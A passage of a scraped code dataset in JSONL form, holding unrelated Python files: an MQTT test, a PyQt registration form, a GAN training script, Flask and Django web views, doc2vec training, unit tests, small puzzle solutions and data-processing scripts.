on_connection_interrupted=on_connection_interrupted,\n on_connection_resumed=on_connection_resumed)\n\nconnect_results = mqtt_connection.connect(\n client_id=CLIENT_ID,\n host_name=args.endpoint,\n port=port).result(TIMEOUT)\nassert(connect_results['session_present'] == False)\n\n# Subscribe\nprint(\"Subscribing to:\", TOPIC)\nqos = mqtt.QoS.AT_LEAST_ONCE\nsubscribe_future, subscribe_packet_id = mqtt_connection.subscribe(\n topic=TOPIC,\n qos=qos,\n callback=on_receive_message)\nsubscribe_results = subscribe_future.result(TIMEOUT)\nassert(subscribe_results['packet_id'] == subscribe_packet_id)\nassert(subscribe_results['topic'] == TOPIC)\nprint(subscribe_results)\nassert(subscribe_results['qos'] == qos)\n\n# Publish\nprint(\"Publishing to '{}': {}\".format(TOPIC, MESSAGE))\npublish_future, publish_packet_id = mqtt_connection.publish(\n topic=TOPIC,\n payload=MESSAGE,\n qos=mqtt.QoS.AT_LEAST_ONCE)\npublish_results = publish_future.result(TIMEOUT)\nassert(publish_results['packet_id'] == publish_packet_id)\n\n# Receive Message\nprint(\"Waiting to receive messsage\")\nassert(receive_event.wait(TIMEOUT))\nassert(receive_results['topic'] == TOPIC)\nassert(receive_results['message'].decode() == MESSAGE)\n\n# Unsubscribe\nprint(\"Unsubscribing from topic\")\nunsubscribe_future, unsubscribe_packet_id = mqtt_connection.unsubscribe(TOPIC)\nunsubscribe_results = unsubscribe_future.result(TIMEOUT)\nassert(unsubscribe_results['packet_id'] == unsubscribe_packet_id)\n\n# Disconnect\nprint(\"Disconnecting\")\nmqtt_connection.disconnect().result(TIMEOUT)\n\n# Done\nprint(\"Test Success\")\n","sub_path":"mqtt_test.py","file_name":"mqtt_test.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"455619867","text":"from PyQt5.QtWidgets import QApplication,QMainWindow,QLineEdit,QMessageBox\r\nfrom PyQt5 import uic\r\nfrom DB import DB\r\nfrom kamera import Kamera as cam2\r\nfrom kamera2 import Kamera as cam1\r\n\r\nclass App(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.win = uic.loadUi(r\"GUI\\ilk.ui\")\r\n self.ilDoldur()\r\n self.win.cmbIL.currentIndexChanged.connect(self.ilceDoldur)\r\n self.win.btKaydet.clicked.connect(self.kaydet)\r\n self.win.btKamera.clicked.connect(self.kameraAc)\r\n self.win.btKamera_2.clicked.connect(self.kameraAc2)\r\n self.cam = cam1()\r\n self.cam2 = cam2()\r\n self.win.show()\r\n \r\n\r\n def ilceDoldur(self):\r\n db = DB()\r\n self.win.cmbILCE.clear()\r\n liste = db.ilceListele(self.win.cmbIL.currentIndex())\r\n self.win.cmbILCE.addItem(\"Seçiniz\")\r\n for IlceKod,IlceAd in liste:\r\n self.win.cmbILCE.addItem(IlceAd)\r\n \r\n\r\n def kameraAc(self):\r\n self.cam.adiSoyadi = self.adi+\"_\"+self.soyadi\r\n self.cam.olustur()\r\n self.cam.widg.show()\r\n \r\n def kameraAc2(self):\r\n self.cam2.widg.show()\r\n \r\n\r\n\r\n def ilDoldur(self):\r\n db = DB()\r\n liste = db.ilListele()\r\n self.win.cmbIL.addItem(\"Seçiniz\")\r\n for IlKod,IlAd in liste:\r\n self.win.cmbIL.addItem(IlAd)\r\n\r\n def kaydet(self):\r\n self.adi = self.win.txtAdi.text()\r\n self.soyadi = self.win.txtSoyadi.text() \r\n il = self.win.cmbIL.currentIndex()\r\n ilce = self.win.cmbILCE.currentIndex()\r\n db = DB()\r\n if db.PersonelEkleme(self.adi,self.soyadi,il,ilce):\r\n QMessageBox.information(self,\"Bilgi\",\"Bilgileriniz başarıyla kaydedildi\")\r\n self.win.btKamera.setEnabled(True)\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n app = QApplication(sys.argv)\r\n ex = App()\r\n sys.exit(app.exec_())","sub_path":"ilk.py","file_name":"ilk.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"417506546","text":"\n\n\"\"\"\n\t@Author: Salman Ahmed\n\n\"\"\"\n\n\n\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout, Concatenate\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D, Add\nfrom keras.layers.advanced_activations import PReLU, LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Model, Sequential\nfrom keras.optimizers import Adam\n\n\ndef build_generator(noise_shape = (100,), img_shape=(100,3,1)):\n model = Sequential()\n model.add(Dense(256, input_shape=noise_shape))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dense(512))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dense(1024))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dense(np.prod(img_shape), activation='tanh'))\n model.add(Reshape(img_shape))\n noise = Input(shape=noise_shape)\n img = model(noise)\n return Model(noise, img)\n\n\ndef build_discriminator(img_rows=100, img_cols=3, channels=1):\n img_shape = (img_rows, img_cols, channels)\n model = Sequential()\n model.add(Flatten(input_shape=img_shape))\n model.add(Dense(512))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(256))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(1, activation='sigmoid'))\n img = Input(shape=img_shape)\n validity = model(img)\n return Model(img, validity)\n\n\ndata = pd.read_csv(\"data/left_lane.csv\")\ndata.pop('action')\ndata = data.sample(frac=1)\nob_netCols = []\nk = 0\nwhile k < 300:\n ob_netCols.append(\"new_col\"+str(k))\n k += 1\nob_net = data[ob_netCols]\nob_net = np.reshape(ob_net.values, (ob_net.shape[0],100,3,1))\nob_net[ob_net>0] = 0\nob_net[ob_net==-1] = -5\nob_net = ob_net + 10\nob_net = ob_net / 10\nob_net = ob_net * 2\nob_net = ob_net - 1\ngenerator = build_generator()\ndiscriminator = build_discriminator()\ndiscriminator.compile(loss='binary_crossentropy', optimizer=Adam(0.0002, 0.5), metrics=['accuracy'])\ngenerator.compile(loss='binary_crossentropy',optimizer=Adam(0.0002, 0.5))\noverallModel = Sequential()\noverallModel.add(generator)\ndiscriminator.trainable = False\noverallModel.add(discriminator)\noverallModel.compile(loss='binary_crossentropy', optimizer=Adam(0.0002, 0.5))\nBATCH_SIZE = int(ob_net.shape[0]/3)\nindc = []\nj = 0\nwhile j < ob_net.shape[0]:\n indc.append(j)\n j+=1\nfor epoch in range(1000):\n noise = np.random.uniform(0, 1.0, size=(BATCH_SIZE,100))\n fakehR = generator.predict(noise)\n valid = np.ones((BATCH_SIZE,1))\n fake = np.zeros((BATCH_SIZE,1))\n# valid[8] = [[[0]]]\n# valid[13] = [[[0]]]\n\n\n valid = valid * (1 - 0.1)\n fake = fake + (0.1)\n\n # highR = data.sample(n=BATCH_SIZE)\n index = np.random.choice(indc, BATCH_SIZE, replace=False) \n highR = ob_net[index]\n\n discriminator.trainable = True\n d_loss_real = discriminator.train_on_batch(highR, valid)\n d_loss_fake = discriminator.train_on_batch(fakehR, fake)\n k = 0\n d_loss = (d_loss_real[0] + d_loss_fake[0]) * 0.5\n\n\n y = np.ones((BATCH_SIZE,1))\n discriminator.trainable = False\n j = 0\n while j < 5:\n noise = np.random.uniform(0, 1.0, size=(BATCH_SIZE,100))\n \n g_loss = overallModel.train_on_batch(noise,y)\n print (\"Epoch : \",epoch, \" Discriminator Loss : \", d_loss, \" Generator Loss : \", g_loss)\n j+=1\ngenerator.save_weights(\"Left_GEN_WEIGHTS.h5\")\n\n","sub_path":"GANS-Lane_Changes_Implementation/training/left_examples_training.py","file_name":"left_examples_training.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"184499008","text":"from flask import Flask, render_template, flash, request, url_for, redirect, session\nimport numpy as np\nimport pandas as pd\nimport os\nIMAGE_FOLDER = os.path.join('static')\napp = Flask(__name__)\n\n#model = load_model('sentiment_analysis_model.h5')\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route('/predict/',methods=['POST'])\ndef predict():\n if request.method == 'POST':\n message = request.form['message']\n data = [message]\n json_table = data.to_json(orient='records')\n return app.response_class(response=json_table,status=200,mimetype='application/json')\n\nif __name__ == \"__main__\":\n #init()\n app.run(host='127.0.0.0',port=4000)\n","sub_path":"Sentiment_Analysis-Tensorflow/text_accept.py","file_name":"text_accept.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"323381987","text":"import pandas as pd\nimport numpy as np\n# from gensim.models import doc2vec\nfrom gensim import models\nfrom gensim.models.deprecated.doc2vec import LabeledSentence\n\n\n# Filepath to main training dataset.\ntrain_file_path = \"/Users/zhewang/Documents/kaggle/train.csv\"\ndtype = {\n 'id': str,\n 'teacher_id': str,\n 'teacher_prefix': str,\n 'school_state': str,\n 'project_submitted_datetime': str,\n 'project_grade_category': str,\n 'project_subject_categories': str,\n 'project_subject_subcategories': str,\n 'project_title': str,\n 'project_essay_1': str,\n 'project_essay_2': str,\n 'project_essay_3': str,\n 'project_essay_4': str,\n 'project_resource_summary': str,\n 'teacher_number_of_previously_posted_projects': int,\n 'project_is_approved': np.uint8,\n}\n# Read data and store in DataFrame.\ntrain_data = pd.read_csv(train_file_path, sep=',', dtype=dtype, low_memory=True).sample(10000)\nessay1 = train_data['project_essay_1']\nids = train_data['id']\n\ness1_list = []\nfor index, row in train_data.iterrows():\n\tess1_list.append(LabeledSentence(row['project_essay_1'].split(\" \"), [row['id']]))\n#size is the vector length, window means how many words are included in one paragraph \nmodel = models.Doc2Vec(size = 100, window = 200, min_count = 3, workers = 1)\nvocab = model.build_vocab(ess1_list)\nmodel.train(ess1_list, epochs=10, total_words=100)\nmodel.save(\"ess1_model.doc2vec\")\n# model_loaded = models.Doc2Vec.load('ess1_model.doc2vec')\n# print \"the first vector is: \"\n# print model.docvecs[0]\n","sub_path":"src/train-doc2vec.py","file_name":"train-doc2vec.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"508735822","text":"import json\n\nimport pytest\n\nfrom oapispec.core import utils\nfrom oapispec.core.utils import immutable\n\n\ndef test_merge_simple_dicts_without_precedence():\n a = {'a': 'value'}\n b = {'b': 'other value'}\n assert utils.merge(a, b) == {'a': 'value', 'b': 'other value'}\n\ndef test_merge_simple_dicts_with_precedence():\n a = {'a': 'value', 'ab': 'overwritten'}\n b = {'b': 'other value', 'ab': 'keep'}\n assert utils.merge(a, b) == {'a': 'value', 'b': 'other value', 'ab': 'keep'}\n\ndef test_merge_recursions():\n a = {\n 'a': 'value',\n 'ab': 'overwritten',\n 'nested_a': {\n 'a': 'nested'\n },\n 'nested_a_b': {\n 'a': 'a only',\n 'ab': 'overwritten'\n }\n }\n b = {\n 'b': 'other value',\n 'ab': 'keep',\n 'nested_b': {\n 'b': 'nested'\n },\n 'nested_a_b': {\n 'b': 'b only',\n 'ab': 'keep'\n }\n }\n assert utils.merge(a, b) == {\n 'a': 'value',\n 'b': 'other value',\n 'ab': 'keep',\n 'nested_a': {\n 'a': 'nested'\n },\n 'nested_b': {\n 'b': 'nested'\n },\n 'nested_a_b': {\n 'a': 'a only',\n 'b': 'b only',\n 'ab': 'keep'\n }\n }\n\ndef test_merge_recursions_with_empty():\n a = {}\n b = {\n 'b': 'other value',\n 'ab': 'keep',\n 'nested_b': {\n 'b': 'nested'\n },\n 'nested_a_b': {\n 'b': 'b only',\n 'ab': 'keep'\n }\n }\n assert utils.merge(a, b) == b\n\ndef test_immutable_raises_when_set():\n obj = immutable(x=2, y=23)\n\n with pytest.raises(TypeError):\n obj['x'] = 5\n\n with pytest.raises(TypeError):\n obj.x = 5\n\n with pytest.raises(TypeError):\n del obj['x']\n\n with pytest.raises(TypeError):\n del obj.x\n\ndef test_immutable_none_comparison():\n obj = immutable(x=2, y=23)\n isEqual = obj == None\n assert isEqual is not True\n\ndef test_immutable_repr_dumps_json():\n obj = immutable(x=2, y=23)\n r = repr(obj)\n json.loads(r)\n\ndef test_immutable_str_dumps_json():\n obj = immutable(x=2, y=23)\n s = str(obj)\n json.loads(s)\n\ndef test_immutable_equality():\n a = immutable(x=2, y=23)\n b = immutable(x=2, y=23)\n\n assert a == b\n","sub_path":"tests/core/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499338226","text":"from pathlib import Path\n\ndata_folder = Path(\".\").resolve()\n\n\nmove_instr = {\"up\": (0, -1), \"down\": (0, 1), \"forward\": (1, 1)}\n\n\ndef part1(data):\n pos = [0, 0]\n for direction, distance in data:\n index, unit = move_instr[direction]\n pos[index] += unit * distance\n return pos[0] * pos[1]\n\n\ndef part2(data):\n pos = [0, 0, 0]\n for direction, distance in data:\n index, unit = move_instr[direction]\n if index == 0:\n pos[2] += unit * distance\n else:\n pos[1] += unit * distance\n pos[0] += pos[2] * distance\n return pos[0] * pos[1]\n\n\ndef parse_line(line):\n direction, distance = line.split()\n distance = int(distance)\n return direction, distance\n\n\ndef main():\n data = data_folder.joinpath(\"input.txt\").read_text()\n data = [parse_line(d) for d in data.split(\"\\n\")]\n\n sub_prod = part1(data)\n print(\"Part 1\")\n print(f\"If we multiply the final horizontal position by the final depth we get {sub_prod}\")\n print()\n\n sub_prod = part2(data)\n print(\"Part 2\")\n print(f\"If we multiply the final horizontal position by the final depth we get {sub_prod}\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2021/02/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"269895587","text":"#!/usr/bin/python\n\nimport subprocess\nprofile_url = \"https://www.vpngate.net/common/openvpn_download.aspx?sid=1584878359201&tcp=1&host=219.100.37.144&port=443&hid=15134922&/vpngate_219.100.37.144_tcp_443.ovpn\"\np = subprocess.Popen(\"docker run -it --rm -e profile=\\\"{0}\\\" openvpncli\".format(profile_url), stdout=subprocess.PIPE, shell=True)\n \n(output, err) = p.communicate()\n \np_status = p.wait()\nresults = output.decode('utf-8')\nif \"ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such file or directory\" in results:\n print (\"OK\")\nelse:\n print (\"ERROR\")\n","sub_path":"VPNGateValidation/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"367800356","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 29 15:33:05 2018\n\n@author: xnguyen\n\"\"\"\n\nimport tensorflow as tf\nimport itertools\n\n\ndef gen():\n for i in itertools.count(1):\n yield (i, [1] * i)\n\nds = tf.data.Dataset.from_generator(\n gen, (tf.int64, tf.int64), (tf.TensorShape([]), tf.TensorShape([None])))\nvalue = ds.make_one_shot_iterator().get_next()\n\nwith tf.Session() as sess:\n for i in range(10): \n print(sess.run(value)) # (1, array([1]))\n #print(sess.run(value)) # (2, array([1, 1]))\n\n\n# Using the generator pattern (an iterable)\nclass generator_recurrent_sin(object):\n def __init__(self, n, time_steps, input_dim, attention_column=13):\n self.n = n \n self.time_steps = time_steps\n self.input_dim = input_dim \n self.attention_column = attention_column\n self.num = 0\n \n def __iter__(self):\n return self.next()\n \n # Python 3 compatibility\n def __next__(self):\n return self.next()\n\n def next(self):\n if self.num < self.n:\n self.num += 1\n x = np.random.standard_normal(size=(self.time_steps, self.input_dim)) \n y = np.random.randint(low=0, high=2, size=(1))\n \n freq = 0\n if y ==0:\n freq = 0.1 * PI\n else:\n freq = 0.5 * PI\n for t in range(self.attention_column, int(self.attention_column+self.input_dim/2)):\n for d in range(self.attention_column):\n x[t, d] = np.sin(t*freq) + 0.05*np.random.randn(1)\n yield (x, y)\n else: \n raise StopIteration()\n\nINPUT_DIM = 32\nTIME_STEPS = 64\nHIDDEN_UNITS = 256\nATTENTION_COLUMN =10\nN=1000\n\ndef get_data_generator():\n return generator_recurrent_sin(N, TIME_STEPS, INPUT_DIM,\n ATTENTION_COLUMN)\n \ndataset = tf.data.Dataset.from_generator(get_data_generator,\n (tf.float32, tf.float32),\n (tf.TensorShape([TIME_STEPS, INPUT_DIM]),\n tf.TensorShape([1])))\nbatch_size=10\n \ndataset = dataset.shuffle(buffer_size=1024) # 1024 files in dataset\ndataset = dataset.repeat() \ndataset = dataset.apply(\n tf.contrib.data.batch_and_drop_remainder(batch_size)\n )\n \ndataset = dataset.prefetch(4)\nimages, labels = dataset.make_one_shot_iterator().get_next()\n\nwith tf.Session() as sess:\n print(sess.run([images, labels]))\n","sub_path":"test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"594506529","text":"# -*- coding: utf-8 -*- \nimport datetime\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom statistic.models import Phone\nfrom .models import Category, PhoneList, Version\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template.context_processors import csrf\n\n@csrf_exempt\ndef phoneData(request):\n if request.method == 'POST':\n device_post = request.POST.get('device')\n key_post = request.POST.get('key')\n if key_post == 'KqePnWoGfHhbLCU4yoPEXi5qXWQk69IE':\n # sync++\n p = Phone.objects.get()\n p.sync_amount += 1\n if device_post == 'iOS':\n # iOS\n p.ios_sync_amount += 1\n elif device_post == 'Android':\n # Android\n p.android_sync_amount += 1\n else:\n # unrecognized device\n return None\n p.save()\n # prepare data\n phoneData = []\n for categoryData in Category.objects.all():\n categoryDict = {}\n categoryDict['name'] = categoryData.category_name\n listArray = []\n for listData in PhoneList.objects.filter(phone_category=categoryData):\n listArray.append({\n 'name': listData.phone_name,\n 'num1': listData.phone_num1,\n 'num2': listData.phone_num2,\n })\n categoryDict['list'] = listArray\n phoneData.append(categoryDict)\n # add Version\n v = Version.objects.get()\n jsonData = {\n 'version': v.version_num,\n 'data': phoneData,\n }\n # ensure_ascii=False Chinese\n return HttpResponse(json.dumps(jsonData, ensure_ascii=False), content_type='application/json')\n else:\n return None\n else:\n return None","sub_path":"phone/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5797559","text":"''' graph_controllers\nroutes related to the graphs\n'''\nimport datetime\nimport json\n\nfrom flask import (render_template, request, flash, redirect, url_for, session\n , abort)\nfrom mongoengine import *\n\nfrom application import app\n\n# view controls\nfrom decorators import *\n# mongoengine models\nfrom models import *\n# some utilities\nimport utilities\n# some constants\nimport constants\n\n\ngraph_route = '/organizations//projects//graphs'\n@app.route(graph_route, defaults={'graph_label': None})\n@app.route(graph_route + '/', methods=['GET', 'POST'])\n@verification_required\n@csrf_protect\ndef graphs(org_label, project_label, graph_label):\n ''' graphin things\n /organizations/aquaya/projects/water-quality/graphs\n : view a list of all graphs for the project\n /organizations/aquaya/projects/water-quality/graphs?create=true\n : create a new graph config, immediately redirect to editing\n /organizations/aquaya/projects/water-quality/graphs/ph-vs-time\n : view a graph\n /organizations/aquaya/projects/water-quality/graphs/ph-vs-time?edit=true\n : edit a graph; accepts GET or POST\n '''\n user = User.objects(email=session['email'])[0]\n \n orgs = Organization.objects(label=org_label)\n if not orgs:\n flash('Organization \"%s\" not found, sorry!' % org_label, 'warning')\n return redirect(url_for('organizations'))\n org = orgs[0]\n\n # permission-check\n if org not in user.organizations and not user.admin_rights:\n app.logger.error('%s tried to view a project but was \\\n denied for want of admin rights' % session['email'])\n abort(404)\n \n # find the project\n projects = Project.objects(label=project_label, organization=org) \n if not projects:\n flash('Project \"%s\" not found, sorry!' % project_label, 'warning')\n return redirect(url_for('organizations', org_label=org.label))\n project = projects[0]\n\n if request.method == 'POST':\n # we have a graph_label\n graphs = Graph.objects(label=graph_label, project=project)\n if not graphs:\n abort(404)\n graph = graphs[0]\n\n form_type = request.form.get('form_type', '')\n if form_type == 'info':\n if graph.name != request.form.get('name', ''):\n name = request.form.get('name', '')\n graph.update(set__name = name)\n\n graphs = Graph.objects(project=project).only('label')\n labels = [g.label for g in graphs]\n graph.update(set__label = utilities.generate_label(name\n , labels))\n\n # reload to catch the name change\n graph.reload()\n\n graph.update(set__description = \n request.form.get('description', ''))\n graph.update(set__graph_type = request.form.get('graph_type', ''))\n\n # axes specify a header and come of the form 'header_id__4abcd001'\n xaxis = request.form.get('xaxis', '')\n if xaxis:\n xaxis = xaxis.split('header_id__')[1]\n header = Header.objects(id=xaxis)[0]\n graph.update(set__xaxis = header)\n\n yaxis = request.form.get('yaxis', '')\n if yaxis:\n yaxis = yaxis.split('header_id__')[1]\n header = Header.objects(id=yaxis)[0]\n graph.update(set__yaxis = header)\n\n # pie chart headers are similar to axes..\n pie_header = request.form.get('pie_header', '')\n if pie_header:\n pie_header = pie_header.split('header_id__')[1]\n header = Header.objects(id=pie_header)[0]\n graph.update(set__pie_header = header)\n\n elif form_type == 'filters':\n # extract the 'any filters' vs 'all' distinction\n filter_settings = request.form.get('apply_any_filters', '')\n if filter_settings == 'true':\n graph.update(set__apply_any_filters = True)\n else:\n graph.update(set__apply_any_filters = False)\n\n # attach filter to graph\n requested_filter_ids = request.form.getlist('filters')\n attached_filters = []\n for requested_id in requested_filter_ids:\n prefix, filter_id = requested_id.split('__')\n filters = Filter.objects(id=filter_id)\n if not filters:\n abort(404)\n attached_filters.append(filters[0])\n\n graph.update(set__filters = attached_filters)\n \n elif form_type == 'admin':\n # delete the graph\n name = graph.name\n utilities.delete_graph(graph, session['email'])\n flash('graph \"%s\" was deleted successfully' % name, 'success')\n return redirect(url_for('graphs', org_label=org.label\n , project_label=project.label))\n \n else:\n # bad 'form_type'\n abort(404)\n \n flash('changes saved successfully', 'success')\n return redirect(url_for('graphs', org_label=org.label\n , project_label=project.label, graph_label=graph.label))\n \n if request.method == 'GET':\n if graph_label:\n graphs = Graph.objects(label=graph_label, project=project)\n if not graphs:\n app.logger.error('%s tried to access a graph that does not \\\n exist' % session['email'])\n flash('Graph \"%s\" not found, sorry!' % graph_label\n , 'warning')\n return redirect(url_for('projects'), org_label=org.label\n , project_label=project.label)\n graph = graphs[0]\n\n if request.args.get('edit', '') == 'true':\n # valid graph types\n graph_types = ['line', 'scatter', 'bar', 'chart', 'pie']\n \n available_filters = Filter.objects(project=project)\n \n return render_template('graph_edit.html', graph=graph\n , graph_types = graph_types\n , allowed_graph_types = constants.graph_types\n , available_filters = available_filters)\n\n else:\n # render a graph\n data = []\n project_count = None\n filtered_count = None\n if graph.graph_type == 'line':\n if graph.xaxis and graph.yaxis:\n data, project_count = (\n utilities.generate_line_graph_data(graph))\n filtered_count = len(data)\n else:\n flash('define an x-axis and y-axis for plotting'\n , 'warning')\n\n elif graph.graph_type == 'pie':\n if graph.pie_header:\n data, project_count = (\n utilities.generate_pie_chart_data(graph))\n filtered_count = sum([i['data'] for i in json.loads(data)])\n else:\n flash('define a column to create this pie chart'\n , 'warning')\n\n return render_template('graph.html', graph=graph, data=data\n , project_count=project_count\n , filtered_count = filtered_count)\n\n if request.args.get('create', '') == 'true':\n # create a new graph\n\n # CSRF validation\n token = request.args.get('token', '')\n if not verify_token(token):\n abort(403)\n\n try:\n graph_name = 'graph-%s' % utilities.generate_random_string(6)\n new_graph = Graph(\n creation_time = datetime.datetime.utcnow()\n , creator = user\n , label = graph_name.lower()\n , project = project\n , name = graph_name\n )\n new_graph.save() \n app.logger.info('graph created by %s' % session['email'])\n flash('graph created; please change the defaults', 'success')\n except:\n app.logger.error('graph creation failed for %s' % \\\n session['email'])\n flash('There was an error, sorry :/', 'error')\n return redirect(url_for('projects', org_label=org.label\n , project=project.label))\n \n # redirect to the editing screen\n return redirect(url_for('graphs', org_label=org.label\n , project_label=project.label, graph_label=new_graph.label\n , edit='true'))\n \n # no graph in particular was specified\n graphs = Graph.objects(project=project)\n return render_template('project_graphs.html', project=project\n , graphs=graphs)\n\n","sub_path":"application/graph_controllers.py","file_name":"graph_controllers.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"652182977","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Importamos funcion donde limpiamos nuestra data y creamos un nuevo csv\nfrom limpieza import limpiar_crear\n# Importamos nuestras funcionoes\nfrom funcionesDatos import buscar, bajas_pastel, sobrevivientesBarras, costoTickets\nimport os\n\n\nif __name__ == '__main__':\n # Llamamos la funcion para limpiar y crear un nuevo csv\n # df_raw = pd.read_excel(\"lista.xlsx\")\n # limpiar_crear(df_raw) # retornamos y cramos data.csv\n\n while True:\n os.system(\"cls\") # Limpieza de pantalla\n print(\"Menu:\")\n print(\"1. Buscar un pasajero por codigo de ticket\")\n print(\"2. Gráfica de bajas y sobrevivientes(pastel)\")\n print(\"3. Gráfica de sobrevivientes por clase(barras)\")\n print(\"4. Reporte de costos de tickets\")\n print(\"5. Salir\")\n\n opc = input(\"Seleccione su opción: \")\n\n if opc == \"1\":\n ticket = input(\"Digite el codigo del ticket(Ej: PC 17318 o 113781): \") # Capturando el ticket\n buscar(ticket)\n input()\n\n elif opc == \"2\":\n bajas_pastel()\n input()\n\n elif opc == \"3\":\n sobrevivientesBarras()\n input()\n\n elif opc == \"4\":\n costoTickets()\n input()\n\n elif opc == \"5\":\n print(\"Hasta pronto...\")\n input()\n break\n\n else:\n print(\"Opción incorrecta\")\n input()\n continue","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"98994393","text":"#Örnek Problem:\r\n\"\"\"\r\nmetreküpü 0.79tl olan doğalgaz Mart ayında 346metreküp harcandığına göre;\r\nkaç lira fatura geleceğini hesaplayın\r\n\"\"\"\r\n\r\nmetreküp=0.79\r\nharcanan=346\r\n\r\nfatura = metreküp*harcanan\r\nprint (fatura)\r\n\r\n\r\n# kaynak: https://python-istihza.yazbel.com/etkilesimli_python.html#karakter-dizilerine-giris","sub_path":"7-07.01.2021/ÖrnekProgramlar/ornekproblem5.py","file_name":"ornekproblem5.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"147760700","text":"# Importing relevant packages\nfrom flask import Blueprint, render_template, request, session, redirect, url_for\nfrom .models import Item, Watchlist, Bid\nfrom . import db\nfrom sqlalchemy.sql.expression import func\nfrom sqlalchemy import desc\n\n# blueprint\nbp = Blueprint('main', __name__)\n\n# Function for index page\n@bp.route('/')\ndef index():\n func.count()\n items = Item.query.all() # grabs all items in db\n # Does a bunch of filtering based on items\n featured_items = Item.query.order_by(func.random()).limit(4).all()\n CPUCategory = Item.query.order_by(func.random()).filter_by(category='CPU').limit(4)\n GPUCategory = Item.query.order_by(func.random()).filter_by(category='GPU').limit(4)\n MoboCategory = Item.query.order_by(func.random()).filter_by(category='Motherboard').limit(4)\n RAMCategory = Item.query.order_by(func.random()).filter_by(category='RAM').limit(4)\n PSUCategory = Item.query.order_by(func.random()).filter_by(category='Power Supply Unit').limit(4)\n FanCategory = Item.query.order_by(func.random()).filter_by(category='Cooling Fan').limit(4)\n # renders the page with variables\n return render_template('index.html', items=items, featured_items=featured_items, CPUCategory=CPUCategory, GPUCategory=GPUCategory, MoboCategory=MoboCategory, RAMCategory=RAMCategory, PSUCategory=PSUCategory, FanCategory=FanCategory)\n\n# Function that allows the user to search for items by name\n@bp.route('/search')\ndef search():\n # grabs the text inputted, then filters DB based on that\n if request.args['search']:\n ite = \"%\" + request.args['search'] + \"%\"\n items = Item.query.filter(Item.name.like(ite)).all()\n return render_template('index.html', search_items=items)\n else:\n return redirect(url_for('main.index'))\n\n\n\n\n","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456324839","text":"# 6549 / calculate max rectangle area in the histogram\nfrom collections import deque\nimport sys\n\nwhile True:\n n, *num = list(map(int, sys.stdin.readline().strip().split()))\n if n == 0: # end\n break\n\n num.append(0) # for terminate histogram, append 0 to end\n area, hist = 0, deque()\n for i, h in enumerate(num):\n # if histogram is not empty and top heigh is higher than h\n while hist and num[hist[-1]] > h:\n ih = num[hist.pop()] # height\n # width is from now index to next top height in histogram and -1 or index\n w = i - hist[-1] - 1 if hist else i\n area = max(area, w * ih) # caluclate area\n hist.append(i) # append index\n print(area)\n","sub_path":"stack/6549.py","file_name":"6549.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"339211422","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n# @Time : 3/29/2018 10:53 AM \n# @Author : sunyonghai \n# @File : create_Main.py \n# @Software: ZJ_AI\n# =========================================================\nimport argparse\nimport random\nimport os\nfrom data_processing.utils.io_utils import mkdir\nfrom config import ROOT_HOME\n\ndef _create_Main(path):\n '''\n create the trainval.txt and test.txt for 